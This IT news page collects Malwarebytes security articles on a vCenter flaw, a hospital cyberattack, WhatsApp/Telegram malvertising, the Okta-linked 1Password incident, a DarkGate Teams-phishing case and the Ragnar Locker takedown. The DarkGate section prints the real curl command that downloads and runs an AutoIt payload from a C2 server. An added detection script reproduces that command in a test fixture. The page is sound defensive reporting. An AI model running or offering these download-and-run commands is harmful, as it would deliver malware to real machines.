IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

Announcing NEW Malwarebytes Identity Theft Protection

We’ve always been committed to keeping you safe and secure online. But these days, cybersecurity isn’t just about defending you from malware; it’s about protecting your—and your family’s—entire digital identity.

We know that people are worried. In fact, in our latest report, titled “Everyone’s afraid of the internet and no one’s sure what to do about it,” we found that 79% of internet users are “very concerned” about online privacy and security risks.

More specifically, we found that 81% worry that identity theft and fraud could happen to them, and 71% say that having their data leaked and identity stolen is one of their biggest fears.

So today, I’m excited to announce we’re extending our product offering to introduce Malwarebytes Identity Theft Protection. Our comprehensive solution scours the dark web for your personal information, prevents your social media account from being hacked, and even keeps an eye on your credit1 —and it’s all backed by an up-to-$2 million identity theft insurance2.


Here’s what you get (based on your selected plan):

  • Ongoing monitoring: Peace of mind that we are actively working in the background to keep you safe
  • Real-time alerts: Immediate notifications if we identify suspicious activity
  • Recommendations and best practices: Advice on how to prevent identity theft, and help if it happens
  • Identity restoration helpline and top-notch customer support.

It’s not easy being online today, but our coverage helps keep your digital identity safe, giving you the confidence to scroll, swipe, click, and post in peace.

Learn more

Existing customers

Already a Malwarebytes customer and want to add Malwarebytes Identity Theft Protection to your subscription? Log into your account at my.malwarebytes.com and go to your subscription page. Click Upgrade, make the selection, and choose Submit Order. You’ll then receive your activation email.


1 Credit scores provided are based on the VantageScore® 3.0 model (likely to be different than what lenders may use to assess your credit worthiness). Credit monitoring is US only.

2 $1 or 2 million (based on selected plan). $2 million is US only.

Note: Malwarebytes Identity Theft Protection is not available in all regions.

 

Update vCenter Server now! VMware fixes critical vulnerability

VMware has issued an update to address one out-of-bounds write and one information disclosure vulnerability in its server management software, vCenter Server.

Since there are no in-product workarounds, customers are advised to apply the updates urgently.

The affected products are VMware vCenter Server versions 7.0 and 8.0 and VMware Cloud Foundation versions 5.x and 4.x.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs patched in these updates are CVE-2023-34048 and CVE-2023-34056.

CVE-2023-34048 is an out-of-bounds write vulnerability in vCenter Server’s implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server could trigger an out-of-bounds write, potentially leading to remote code execution (RCE). The vulnerability has a CVSS score of 9.8 out of 10.

DCE/RPC, which is short for “Distributed Computing Environment / Remote Procedure Calls”, is the remote procedure call system developed to allow programmers to write distributed software as if it were all working on the same computer, without having to worry about the underlying network code.

An out-of-bounds write or read flaw makes it possible to manipulate parts of the memory which are allocated to more critical functions. This could allow an attacker to write code to a part of the memory where it will be executed with permissions that the program and user should not have.

VMware is not currently aware of exploitation “in the wild,” but urges customers to consider this an emergency change, and your organization should consider acting quickly.

CVE-2023-34056 is a partial information disclosure vulnerability. A malicious actor with non-administrative privileges to vCenter Server could use this issue to access unauthorized data. It has a CVSS score of 4.3 out of 10.

Patching

While VMware normally does not mention end-of-life products in VMware Security Advisories, due to the critical severity of this vulnerability and the lack of a workaround, VMware has made a patch generally available for vCenter Server 6.7U3, 6.5U3, and VCF 3.x. For the same reasons, VMware has made additional patches available for vCenter Server 8.0U1.

Fixed version(s) and release notes:

VMware vCenter Server 8.0U2
Downloads and Documentation:
https://customerconnect.vmware.com/downloads/details?downloadGroup=VC80U2&productId=1345&rPId=110105

VMware vCenter Server 8.0U1d
Downloads and Documentation:
https://customerconnect.vmware.com/downloads/details?downloadGroup=VC80U1D&productId=1345&rPId=112378

VMware vCenter Server 7.0U3o
Downloads and Documentation:
https://customerconnect.vmware.com/downloads/details?downloadGroup=VC70U3O&productId=974&rPId=110262

Cloud Foundation 5.x/4.x
https://kb.vmware.com/s/article/88287

VMware also published an FAQ about this update.


We don’t just report on vulnerabilities—we identify them, and prioritize action.

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Cyberattack hits 5 hospitals

Canadian health service provider TransForm has published an update about the cyberattack at its member hospitals.

TransForm is a not-for-profit, shared service organization founded by the five hospitals in Erie St. Clair to manage their hospital IT, supply chain, and accounts payable needs.

The five affected hospitals, Bluewater Health, Chatham Kent Health Alliance, Erie Shores HealthCare, Hôtel-Dieu Grace Healthcare, and Windsor Regional Hospital, have had to reschedule appointments with their patients due to the attack.

On October 23, 2023, TransForm released news that its member hospitals and Windsor-Essex Hospice were experiencing a systems outage, including email. In an update later that day it said the incident was impacting the hospitals’ provision of care in various ways.

“For those patients who have care scheduled in the next few days, the hospitals will contact you directly, if possible, to reschedule or provide alternate arrangements.”

Even though TransForm does not provide any more details about the nature of the attack, it’s highly likely that this is a supply chain attack since all member hospitals are experiencing problems.

In a media release, the affected hospitals asked patients to reduce the impact by only visiting the hospitals if they need emergency care.

Because there is no clarity about the nature of the attack, it’s hard to say what other consequences it may have on the hospitals and their patients.

“We are investigating the cause and scope of incident, including whether any patient information was affected. Our investigation is ongoing and we will provide further updates, as appropriate.”

All parties have declined to comment until more information becomes available.

The risks of compromised supply chains keep growing, and as long as organizations continue to rely on them without fully understanding the implications, those risks are here to stay. It is essential for businesses and their suppliers to work together to harden their defenses and minimize the risk of having their supply chain compromised.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Hong Kong residents targeted in malvertising campaigns for WhatsApp, Telegram

Malvertising is a powerful malware or scam delivery mechanism that makes it easy to target specific geographies or even users. A recent article from the South China Morning Post discussed an increase in malicious webpages for the popular WhatsApp communication tool, driven via malicious Google ads. The paper described how these ads appeared to be exclusively targeted at people from Hong Kong and have caused losses of about USD$300K last month.

We started investigating this situation and were able to identify what may be a similar campaign. The decoy sites we saw used a page similar to the web version of WhatsApp to trick victims into scanning a QR code to link their new device. Instead, it wasn’t the user’s device that was added to the WhatsApp account, but rather the threat actor’s.

We also found another campaign using an ad for messaging tool Telegram, to lure victims into downloading a malicious version of the program. Again, this attack was targeted at residents of Hong Kong.

We have reported the malicious ads to Google and worked with partners to take down the infrastructure used in these campaigns.

Malicious WhatsApp ad leads to QR code page

Just as the South China Morning Post reported, users were seeing malicious ads for WhatsApp; we were able to find one immediately after switching our online profile to a Hong Kong IP address:


The text of the ad reads as follows (translated from Chinese):

WhatsApp New Version – WhatsApp Official Authorization

We are constantly updating and launching various fun and interesting functions as well as safe and reliable communication applications. Welcome to download and experience it. The cross-platform application brings you a reliable experience, and you can send private messages to your friends at any time.

Clicking on the ad leads to a convincing lookalike site in Chinese that pretends to be WhatsApp Web:


What’s interesting, and works well as a lure, is the fact that WhatsApp is not just a mobile phone app, but does indeed have a web version for computers as well. The real domain for it is hosted at web.whatsapp.com and also uses a QR code to add a linked device to your account. What this means is that you can use WhatsApp on your PC or Mac after you scan the QR code and authorize that new device from your phone.

The issue here is that the QR code you are scanning is from a malicious site that has nothing to do with WhatsApp:


The domain used to generate those QR codes (lawrencework[.]com) was registered just two days ago. A search on urlscan.io reveals that it is associated with several other fake WhatsApp pages. We tested the QR code by adding it from a burner phone with a brand new WhatsApp account without any previous linked devices. A few seconds later, we saw a new device was added (Google Chrome running on Mac OS):


While we could not get more information (IP address, geolocation) about this new device, we knew it was not ours. When you link a new device to your WhatsApp account, the saved chat history is synced to it. This means that an attacker can essentially read your entire past and future conversations and has access to your saved contacts.


Telegram ad links to malware

The second ad we saw related to this campaign was using Telegram as a lure. We know it is related to the above WhatsApp attack because the ad is from the same advertiser.

The text of the ad reads as follows (translated from Chinese):

telegram official website – telegram Chinese version – telegram download Telegram Chinese version is a Telegram client specially developed for Chinese users. Welcome to the Chinese channel, a new era of information, delivering more exciting information

It links to a Google Docs page pretending to be a download site:

Telegram instant messaging – simple, fast, secure and syncs across all your devices. It is one of the most downloaded apps in the world, with over 500 million active users. The latest official Telegram Chinese computer version TG-Chinese version: Click to download TG-PC: Click to download


The two (identical) links download an MSI installer from the following URL:

kolunite.oss-ap-southeast-7.aliyuncs[.]com/HIP-THH-19-1.msi

This installer has been injected with malware, which we can see once we execute it:


Targeted malvertising and motives

These two campaigns abusing the WhatsApp and Telegram brands could be used for a variety of reasons. We did not investigate further what the ultimate ploy was, although both lead to data theft, impersonation and malware. The threat actor could use any private information from past conversations, phish the victim’s contacts and much more.

This was our first foray into malvertising attacks targeted at Hong Kong. Given that this special administrative region of the People’s Republic of China has a long history of tensions with Beijing, we could not help but think that malvertising campaigns such as these could be used for political reasons, although we saw no evidence of it.

Linking additional devices via QR code is a useful feature but it can also easily be abused. It’s important to be cautious when scanning QR codes by verifying which site is issuing those. It’s a good idea to periodically check which devices have access to your accounts, and revoke any that you don’t recognize.

Thanks to Nathan Collier for the assist with the QR code scanning on Android.

Indicators of Compromise

Malicious WhatsApp domains

uaa.vvg2rt[.]top
wss.f8ddcc[.]com

QR code hostname

119srv[.]lawrencework[.]com

Telegram MSI URL

kolunite.oss-ap-southeast-7.aliyuncs[.]com/HIP-THH-19-1.msi

Telegram MSI

36d11b18d3345ff743f7b003d10a0820c8c1661dd7dc279434e436de798c3a4b

1Password reports security incident after breach at Okta

Password manager 1Password says it’s been affected by a breach at Okta, but it reports no user data has been stolen.

In a security incident report, 1Password says that a member of its IT team received an unexpected email suggesting they had initiated an Okta report of a list of admins. They hadn’t requested it so they reported the email to the security department.

An internal investigation showed unsolicited activity in the Okta environment which was traced to a suspicious IP address. Later it was confirmed that an attacker had accessed 1Password’s Okta environment using administrative privileges. 1Password says it took action straight away:

“We immediately terminated the activity, investigated, and found no compromise of user data or other sensitive systems, either employee-facing or user-facing.”

Okta breach

On Friday, Okta said it spotted an attacker using a stolen credential to access Okta’s support case management system. This allowed them to view files uploaded by certain Okta customers as part of recent support cases.

It’s normal for Okta support to ask customers to upload an HTTP Archive (HAR) file, which allows the team to troubleshoot issues by replicating what’s going on in the browser. As such, a HAR file can contain sensitive data, including cookies and session tokens, that cybercriminals can use to impersonate valid users.
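As an added example (not code from 1Password, Okta or the original post), the script below redacts the cookies, authorization headers, token parameters and bodies a HAR file carries before it is handed to a support team, then counts any credential-looking strings left behind. It assumes the public HAR 1.2 JSON layout; the sample capture is constructed with fake values.

```python
"""Redact session material from an HTTP Archive (HAR) file before it is
shared with a vendor's support team, then verify nothing credential-like
remains. Added example; not 1Password's, Okta's or the post's own code.
Assumes the HAR 1.2 layout: log -> entries[] -> request/response, each with
cookies, headers, queryString, postData and content members.
Usage: python scrub_har.py capture.har capture.scrubbed.har
"""
import copy
import json
import re
import sys

REDACTED = "[REDACTED]"
# Header/parameter names that commonly carry credentials (assumed list, not exhaustive).
SENSITIVE_NAMES = {
    "cookie", "set-cookie", "authorization", "proxy-authorization",
    "x-api-key", "x-csrf-token", "token", "access_token", "id_token",
    "refresh_token", "session", "code", "password",
}
# Credential-looking strings: bearer/basic credentials and JWTs (base64 of '{"' is "eyJ").
LEAK_PATTERNS = [
    re.compile(r"(?i)\b(?:bearer|basic)\s+[A-Za-z0-9._~+/=-]{8,}"),
    re.compile(r"\beyJ[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}\.[A-Za-z0-9_-]{8,}"),
]


def _redact_named(pairs):
    """Blank the value of each name/value pair whose name is on the sensitive list."""
    for pair in pairs:
        if pair.get("name", "").lower() in SENSITIVE_NAMES:
            pair["value"] = REDACTED


def _redact_all(pairs):
    """Blank every value; used for cookie lists, where any cookie may be a session id."""
    for pair in pairs:
        pair["value"] = REDACTED


def scrub_har(har):
    """Return a scrubbed deep copy of a parsed HAR; the input is left untouched."""
    har = copy.deepcopy(har)
    for entry in har.get("log", {}).get("entries", []):
        req = entry.get("request", {})
        resp = entry.get("response", {})
        _redact_all(req.get("cookies", []))
        _redact_all(resp.get("cookies", []))
        _redact_named(req.get("headers", []))
        _redact_named(resp.get("headers", []))
        _redact_named(req.get("queryString", []))
        post = req.get("postData", {})
        _redact_named(post.get("params", []))
        if "text" in post:
            post["text"] = REDACTED  # form bodies carry passwords and tokens
        content = resp.get("content", {})
        if "text" in content:
            content["text"] = REDACTED  # response bodies echo tokens and profile data
    return har


def find_leaks(har):
    """Count credential-looking strings anywhere in the HAR; expect 0 after scrubbing."""
    blob = json.dumps(har)
    return sum(len(pattern.findall(blob)) for pattern in LEAK_PATTERNS)


# Constructed sample of what a login-flow capture typically contains (fake values).
FAKE_JWT = "eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.c2lnbmF0dXJlc2lnbmF0dXJl"
SAMPLE_HAR = {"log": {"version": "1.2", "entries": [{
    "request": {
        "method": "POST", "url": "https://idp.example.test/oauth2/token",
        "cookies": [{"name": "sid", "value": "s3ss10n-c00k13"}],
        "headers": [
            {"name": "Cookie", "value": "sid=s3ss10n-c00k13"},
            {"name": "Authorization", "value": "Bearer " + FAKE_JWT},
            {"name": "User-Agent", "value": "Mozilla/5.0"},
        ],
        "queryString": [{"name": "code", "value": "authz-code-123"}],
        "postData": {"mimeType": "application/x-www-form-urlencoded",
                     "text": "username=alice&password=hunter2"},
    },
    "response": {
        "status": 200,
        "cookies": [{"name": "sid", "value": "new-s3ss10n"}],
        "headers": [{"name": "Set-Cookie", "value": "sid=new-s3ss10n; HttpOnly"},
                    {"name": "Content-Type", "value": "application/json"}],
        "content": {"mimeType": "application/json",
                    "text": json.dumps({"access_token": FAKE_JWT})},
    },
}]}}


def main(argv):
    if len(argv) != 3:
        print("usage: scrub_har.py in.har out.har", file=sys.stderr)
        return 2
    with open(argv[1], encoding="utf-8") as fh:
        clean = scrub_har(json.load(fh))
    leaks = find_leaks(clean)
    with open(argv[2], "w", encoding="utf-8") as fh:
        json.dump(clean, fh, indent=2)
    print(f"wrote {argv[2]}; credential-looking strings remaining: {leaks}")
    return 0 if leaks == 0 else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Request and response metadata (URLs, methods, status codes, timings) survive the scrub, which is usually what support needs to replay a browser problem.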

A member of 1Password’s IT team was engaged with Okta support, and at their request, created and uploaded such a HAR file to the Okta Support Portal.

In the early morning hours of Friday, September 29, 2023, an unknown actor used the same Okta session that was used to create the HAR file to access the Okta administrative portal.

If the 1Password incident is a consequence of the same Okta breach, this puts the Okta breach which was discovered by BeyondTrust on October 2, 2023 in a new light with regard to the timeline. BeyondTrust says it had to persist with escalations within Okta until October 19, when Okta security leadership notified BeyondTrust that it had indeed experienced a breach and that BeyondTrust was one of the affected customers.

Okta says it has now notified all impacted customers.

“All customers who were impacted by this have been notified. If you’re an Okta customer and you have not been contacted with another message or method, there is no impact to your Okta environment or your support tickets.”

1Password suspects that the attackers were merely looking for information that would allow them to attack on a larger scale. They tried, for example, to access the IT team member’s user dashboard, but that attempt was blocked by Okta. They also requested a report of administrative users, which was the action that triggered the investigation.

A thorough investigation of the circumstances and the device that was used to upload the HAR file did not reveal any reasons for the information to be captured. It did reveal which vendor 1Password relies on in a crisis, though.

“The IT team member’s macOS laptop that was used is currently offline, and was scanned with the free version of Malwarebytes, which reported no findings.”

It wasn’t until after Okta revealed it’d had a security incident that 1Password realized the information was stolen during that incident.

Data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

Malwarebytes Managed Detection and Response (MDR) simply and effectively closes your security resources gap, reduces your risk of unknown threats, and increases your security efficiency exponentially. Malwarebytes MDR staffs highly experienced Tier 2 and Tier 3 analysts who are hands-on with customer endpoints, ensuring critical threats are quickly identified and a thorough response is rapidly deployed.

Want to learn more about MDR? Get a free trial below.

TRY NOW

Google Chrome wants to hide your IP address

Google is working out some kinks in the project formerly known as Gnatcatcher, which will now be known under the more descriptive name “IP Protection.” That means Chrome is reintroducing a proposal to hide users’ IP addresses, to make cross-site tracking more difficult.

An Internet Protocol (IP) address is a unique number that’s assigned to your computer when it joins a network. The number acts as your address on the network. In order for two computers to communicate, each must know the other’s address, so that messages go to the right place.

The IP address you use on the Internet is typically the one that your router is given by your ISP (Internet Service Provider). Although the IP address you use isn’t assigned to you permanently, it will likely go unchanged until you disconnect or turn off your router. Blocks of IP addresses are assigned geographically, so it’s also possible to use them for a form of crude geolocation, accurate to about the nearest city.

Your IP address’s combination of persistence and uniqueness makes it a useful identifier for anyone who wants to track you across multiple websites. It can also be combined with other semi-permanent information from your browser to create an even more accurate “fingerprint”, that identifies you when you browse.

Over time this fingerprint can be used to build up a unique, persistent user profile that can be used for targeted advertising, which many people see as a threat to their privacy.

As a result, some users do not like to reveal their IP address, so they hide it using a proxy server or a VPN. Both proxies and VPNs mask a user’s IP address with one of their own. Only the proxy operator or VPN provider knows the user’s real address.

Google’s IP Protection proposal will use proxies to hide users’ IP addresses.

Because there are some potentially unwanted side-effects, and Google wants to learn as it goes, the feature will be tested and rolled out in multiple phases. In the first phase the feature will use a single Google-owned proxy, will only proxy requests to domains owned by Google, and will only work for users with US-based IP addresses.

Apparently Google wants to test the infrastructure without impacting third-party companies. Domains owned by Google include services like Gmail, but also AdServices. Note that in this phase Google will automatically enroll a small percentage of users, and they must be logged in to Chrome.

In later phases Google plans to use a chain of two proxies so that neither proxy can see both the origin and destination IP addresses. There are some concerns that will need to be ironed out in the course of the testing phases:

  • Defensibility, since a compromised proxy may be used to deploy attacks.
  • Disruption of existing Denial of Service (DoS) defenses by using the two proxies.
  • Disruption of existing defenses for fraud and invalid traffic detection. For example, depending on the way they work, some block-lists will no longer be effective because the final destination is not detected.

Google expects that this may change plans along the way, and states:

“Long term solutions will evolve and will be shaped in conjunction with the ecosystem. We will collaborate with ISPs, CDNs, third parties, and destination sites towards the end-state of privacy proxies for the web. For instance, ISPs and CDNs are well suited to operate privacy proxies.”

We will keep an eye on how this development takes shape. But even if I could, I would not sign up for the first phase if I were a user who currently uses a VPN to hide their IP address, because in this phase Google will be able to see both your IP address and the site you are visiting, which means you would only be shifting the information gathering from several Google services to one central point.


We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

A week in security (October 16 – October 22)

Battling a new DarkGate malware campaign with Malwarebytes MDR

First publicly reported in 2018, DarkGate is a Windows-based malware with a wide range of capabilities including credential stealing and remote access to victim endpoints. Until recently, it was only seen being delivered through traditional email malspam campaigns. In late August 2023, however, researchers at Truesec found evidence of a campaign using external Teams messages to deliver the DarkGate Loader.

On September 13th, 2023, the Malwarebytes MDR team spotted the same campaign on a client network.

The Initial Incident

The threat began as a phishing attempt via Microsoft Teams. The attackers sent a malicious ZIP file named “C_onfidential Sign_ificant Company Changes.zip” (the names may vary in different iterations of the attack).

Phishing message sent to targets via Microsoft Teams in the same DarkGate campaign. Image: Truesec

A number of employees clicked on this file believing it to be legitimate. Inside this ZIP file, however, were several malicious shortcut files, or LNK files, that were disguised as PDF documents.

The names of these LNK files included “EMPLOYEES_AFFECTED_BY_TRANSITION.PDF.LNK” and “COMPANY_TRANSFORMATIONS.PDF.LNK“.

The Malicious Command

When employees clicked on these shortcuts, it triggered a malicious command line. Its purpose? To download and run a harmful script from a remote IP address. Fortunately, Malwarebytes EDR recognized this IP as a ‘Known bad’ destination and blocked it.


Multiple attempts to execute processes such as curl commands

DarkGate Loader – The Culprit

As the MDR team delved deeper into the incident, they discovered that this was not a random attack. It was connected to a known malware attack campaign using Teams phishing to install DarkGate Loader. The curl command is used to fetch and deposit malicious files onto the victim’s machine:

"C:\Windows\System32\cmd.exe" /k curl -# -o "C:\Users\[Redacted]\AppData\Local\Temp\Autoit3.exe" "http://5[.]188[.]87[.]58:2351" -o "C:\Users\[Redacted]\AppData\Local\Temp\btbgvbyy.au3" "http://5[.]188[.]87[.]58:2351/msibtbgvbyy" "C:\Users\[Redacted]\AppData\Local\Temp\Autoit3.exe" "C:\Users\[Redacted]\AppData\Local\Temp\btbgvbyy.au3" & exit

The malicious command attempts to run an AutoIt script (btbgvbyy.au3). Director of Threat Intelligence Jerome Segura notes that the use of AutoIt, a legitimate scripting language, was already present in the very early versions of DarkGate.
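As an added example (not Malwarebytes EDR logic), the detector below turns the chain described above into two rules over process-creation events: curl writing an executable or .au3 script into the user's Temp folder from a bare-IP URL, and the AutoIt3 interpreter launched from Temp with a script that is also in Temp. The events are constructed; 192.0.2.10 is a documentation address standing in for the C2 server, and the field names (image, parent, command_line) are assumed.

```python
"""Flag the DarkGate delivery chain (cmd.exe /k curl staging an AutoIt3
interpreter and .au3 script in %TEMP%, then executing it) in
process-creation events. Added example, not Malwarebytes EDR logic.
Events are constructed dicts with the fields a Sysmon Event ID 1 or EDR
process record carries; 192.0.2.10 stands in for the real C2 address.
"""
import re

TOKEN = re.compile(r'"([^"]*)"|(\S+)')
IP_URL = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/|$)")
STAGED_EXTENSIONS = (".exe", ".au3", ".dll")


def split_args(command_line):
    """Split a Windows command line into arguments, dropping surrounding quotes."""
    return [quoted or bare for quoted, bare in TOKEN.findall(command_line)]


def in_user_temp(path):
    """True for paths under %LOCALAPPDATA%\\Temp, where the loader stages its files."""
    return "\\appdata\\local\\temp\\" in path.lower()


def detect(event):
    """Return the names of the rules one process-creation event matches."""
    hits = []
    args = split_args(event.get("command_line", ""))
    lowered = [a.lower() for a in args]
    # Rule 1: curl writing an exe/au3/dll into %TEMP% from a bare-IP URL (any port).
    if any(a == "curl" or a.endswith("\\curl.exe") for a in lowered):
        outputs = [args[i + 1] for i, a in enumerate(args[:-1]) if a == "-o"]
        staged = [o for o in outputs
                  if in_user_temp(o) and o.lower().endswith(STAGED_EXTENSIONS)]
        if staged and any(IP_URL.match(a) for a in args):
            hits.append("curl_stages_payload_in_temp_from_ip")
    # Rule 2: AutoIt3 interpreter in %TEMP% given a .au3 script that is also in %TEMP%.
    for current, following in zip(args, args[1:]):
        if (in_user_temp(current) and current.lower().endswith("\\autoit3.exe")
                and in_user_temp(following) and following.lower().endswith(".au3")):
            hits.append("autoit_script_run_from_temp")
            break
    return hits


def scan(events):
    """Map event id -> matched rules for every event that triggers at least one rule."""
    findings = {}
    for event in events:
        hits = detect(event)
        if hits:
            findings[event["id"]] = hits
    return findings


# Constructed process-creation events; only events 1 and 4 belong to the attack chain.
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "command_line": (r'"C:\Windows\System32\cmd.exe" /k curl -# '
                      r'-o "C:\Users\bob\AppData\Local\Temp\Autoit3.exe" "http://192.0.2.10:2351" '
                      r'-o "C:\Users\bob\AppData\Local\Temp\btbgvbyy.au3" "http://192.0.2.10:2351/msibtbgvbyy" '
                      r'& "C:\Users\bob\AppData\Local\Temp\Autoit3.exe" '
                      r'"C:\Users\bob\AppData\Local\Temp\btbgvbyy.au3" & exit')},
    {"id": 2, "image": r"C:\Windows\System32\curl.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "command_line": r'curl -o "C:\Users\bob\Downloads\tool.zip" https://downloads.example.test/tool.zip'},
    {"id": 3, "image": r"C:\Program Files\AutoIt3\AutoIt3.exe", "parent": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Program Files\AutoIt3\AutoIt3.exe" "C:\Users\bob\scripts\build.au3"'},
    {"id": 4, "image": r"C:\Users\bob\AppData\Local\Temp\Autoit3.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "command_line": r'"C:\Users\bob\AppData\Local\Temp\Autoit3.exe" "C:\Users\bob\AppData\Local\Temp\btbgvbyy.au3"'},
]

if __name__ == "__main__":
    for event_id, rules in scan(EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

Events 2 and 3 (a curl download to Downloads from a hostname, and AutoIt3 run from Program Files) are there to show the rules stay quiet on ordinary use of the same tools.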


Malwarebytes EDR recognizing suspicious AutoIt activity


Infected system exhibiting Indicators of Compromise (IOCs)

Recognizing the gravity of the situation, the team began collecting Indicators of Compromise (IOCs). This included hashes of the ZIP file, its contents, and samples of the malevolent script initiated by the shortcuts.

Actions Taken

Swift action was taken by isolating the affected machines. Although Malwarebytes EDR had already blocked the malicious IP, the MDR team took extra precautions, ensuring that no persistence mechanisms were present on the endpoints, which could have given attackers a backdoor to the system.

The MDR team also suggested blocking the download of files from external accounts in Microsoft Teams, which was the primary attack vector in this campaign.

Lessons from the Incident

By using a combination of evasion techniques, the threat actors behind these campaigns are able to distribute DarkGate with a minimal system footprint. If the infection had continued, the company could have faced potential data breaches, operational disruptions, financial losses, and more.

Fortunately, the collaborative efforts of Malwarebytes MDR, EDR, and the customer successfully mitigated the DarkGate malware and safeguarded the customer’s digital environment against possible reinfection.

Learn more about how Malwarebytes MDR today can help secure your organization: https://try.malwarebytes.com/mdr-consultation-new/

Get a Malwarebytes MDR quote

Read other front-line stories about how Malwarebytes MDR analysts do threat hunting on customer networks:

Tracking down a trojan: An inside look at threat hunting in a corporate network

Understanding ransomware reinfection: An MDR case study

Indicators of Compromise (IoC)

File Details:

Filename: C_onfidential Sign_ificant Company Changes.zip

Reported At: 09/13/2023 9:57:56 AM

Network Indicators:

C2 IP Address: 5[.]188[.]87[.]58

Malicious URLs:

http://5[.]188[.]87[.]58:2351

http://5[.]188[.]87[.]58:2351/msibtbgvbyy

MGM attack is too late a wake-up call for businesses, says James Fair: Lock and Code S04E22

This week on the Lock and Code podcast…

In September, the Las Vegas casino and hotel operator MGM Resorts became a trending topic on social media… but for all the wrong reasons. A TikTok user posted a video taken from inside the casino floor of the MGM Grand—the company’s flagship hotel complex near the southern end of the Las Vegas strip—that didn’t involve the whirring of slot machines or the sirens and buzzers of sweepstake earnings, but, instead, row after row of digital gambling machines with blank, non-functional screens. That same TikTok user commented on their own post that it wasn’t just errored-out gambling machines that were causing problems—hotel guests were also having trouble getting into their own rooms.

As the user said online about their own experience: “Digital keys weren’t working. Had to get physical keys printed. They doubled booked our room so we walked in on someone.”

The trouble didn’t stop there.

A separate photo shared online allegedly showed what looked like a Walkie-Talkie affixed to an elevator’s handrail. Above the device was a piece of paper and a message written by hand: “For any elevator issues, please use the radio for support.”  

As the public would soon learn, MGM Resorts was the victim of a cyberattack, reportedly carried out by a group of criminals called Scattered Spider, which used the ALPHV ransomware.

It was one of the most publicly-exposed cyberattacks in recent history. But just a few days before the public saw the end result, the same cybercriminal group received a reported $15 million ransom payment from a separate victim situated just one and a half miles away.

On September 14, Caesar’s Entertainment reported in a filing with the US Securities and Exchange Commission that it, too, had suffered a cyber breach, and according to reporting from CNBC, it received a $30 million ransom demand, which it then negotiated down by about 50 percent.

The social media flurry, the TikTok videos, the comments and confusion from customers, the ghost-town casino floors captured in photographs—it all added up to something strange and new: Vegas was breached. 

But how? 

Though follow-on reporting suggests a particularly effective social engineering scam, the attacks themselves revealed a more troubling, potential vulnerability for businesses everywhere, which is that a company’s budget—and its relative ability to devote resources to cybersecurity—doesn’t necessarily insulate it from attacks. 

Today on the Lock and Code podcast with host David Ruiz, we speak with James Fair, senior vice president of IT Services at the managed IT services company Executech, about whether businesses are taking cybersecurity seriously enough, which industries he’s seen pushback from for initial cybersecurity recommendations (and why), and the frustration of seeing some companies only take cybersecurity seriously after a major attack. 

“How many do we have to see? MGM got hit, you guys. Some of the biggest targets out there—people who have more cybersecurity budget than people can imagine—got hit. So, what are you waiting for?”

Tune in today to listen to the full conversation.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Ragnar Locker ransomware group taken down

Even though it had a long run for a ransomware group, it seems the bell might be tolling for Ragnar Locker. On October 19, 2023, the group’s leak site was seized by an international group of law enforcement agencies.

seizure notice on Ragnar Locker's leak site

The takedown action was carried out between 16 and 20 October. During the action, searches were conducted in Czechia, Spain and Latvia. The main target, suspected of being a developer of the Ragnar group, has been brought in front of the examining magistrates of the Paris Judicial Court.

The action was coordinated at international level by Europol and Eurojust. The ransomware group’s infrastructure was also seized in the Netherlands, Germany and Sweden and the associated data leak website was taken down in Sweden.

Ragnar Locker started operations at the end of 2019, making it unusually long-lived. Most ransomware groups do not survive that long, usually because of internal struggles or a takedown such as this one.

Based on known attacks, as tracked in our monthly ransomware reviews, Ragnar Locker was number 15 on the list of the most active ransomware groups over the last twelve months. (A known attack is one where a victim’s details are posted on a ransomware group’s leak website because they didn’t pay a ransom. The number of known attacks probably represents 50%-75% of the total attacks.)

Known attacks by Ragnar Locker, October 2022 – September 2023

Ragnar Locker has been called out for specifically targeting the energy sector—after attacks on Energias de Portugal (EDP) and Greek gas operator DESFA—but at Malwarebytes we never noticed any such specialization. In the chart below, you can see that across 36 known attacks in the last 12 months it hit 15 different sectors.


Ragnar Locker’s known attacks by industry sector, October 2022 – September 2023

In 2022, the FBI published a flash alert to warn that the Ragnar Locker ransomware gang had breached the networks of at least 52 organizations across 10 critical infrastructure sectors.

One of the biggest upsets occurred when Ragnar Locker published information it had stolen from police computers in Zwijndrecht, a municipality in the province of Antwerp, Belgium. The stolen information included police records about license plates, speeding tickets, and at least one case of child abuse. Other high-profile victims include Campari and Capcom.

